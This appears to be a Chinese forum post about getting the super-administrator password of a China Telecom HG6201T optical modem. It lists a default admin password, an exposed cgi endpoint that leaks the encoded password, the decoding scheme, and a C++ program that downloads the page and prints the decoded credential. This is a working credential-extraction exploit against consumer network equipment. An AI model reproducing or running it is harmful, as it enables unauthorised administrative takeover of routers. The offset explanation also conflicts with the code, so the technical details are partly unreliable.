电信光猫 HG6201T 超管账号密码 维护结束前默认为:nE7jA%5m 维护结束 后获取密码方法如下
1,登录路由器的banseinfo页面, 获取baseinfo信息baseinfo地址:http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi
2,通过对比路由器上明文标注的普通账号的密码, 猜出加密方式, 解析加密后的ascii编码
3,解析ascii编码,以&符号为分隔符, split字符串, 拿到数组, 每一个数字减去4就得到ascii编码, 转成字符串拼接起来。
超管密码前面telecomadmin固定,后面8位数字偏移量为0不是4.
#include<stdio.h>
#include<stdlib.h>
#include<iostream>
#include<string>
#include<UrlMon.h>
#pragma comment(lib, "urlmon.lib")
using namespace std;
int main() {
HRESULT hr = URLDownloadToFile(nullptr,"http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi","passwd",0,0);
if (hr != S_OK)
{
cout << "下载失败程序退出 ! ! !" << endl;
return 1;
}
else
{
cout << "下载成功" << endl;
}
FILE* Fcgi = nullptr;
char bash[32] = "";
/*UINT num[512] = {O}, n;*/
unsigned char TPassword[64] = { 0 };
errno_t err = 0;
long fnum = 0;
err = fopen_s(&Fcgi, "passwd", "rb");
if (err == 0)
{
cout << "文件打开成功 * * *" << endl;
if (0 != Fcgi)
{
while (true)
{
memset(bash, 0, 32);
fscanf_s(Fcgi, "%[^\"_]%*c", bash, 32);
if (fnum == ftell(Fcgi))
{
//fseek(Fcgi, 1, SEEK_CUR);
fseek(Fcgi, 1, 1);
}
fnum = ftell(Fcgi);
if (!strcmp(bash, "TELECOMPASSWORD"))
{
fread_s(bash, 2, 1, 2, Fcgi);
memset(TPassword, 0, 64);
for (size_t i = 0; i < 64; i++)
{
fscanf_s(Fcgi, "%hhu&]", &TPassword[i]);
if (TPassword[i] == 0) {
break;
}
}
break;
}
}
for (size_t i = 0; i < 12; i++)
{
TPassword[i] -= 4;
}
cout <<"超级管理密码:"<< TPassword << endl;
fclose(Fcgi);
}
}
else {
cout << "文件打开失败 ! ! !" << endl;
}
system("pause");
return 0;
}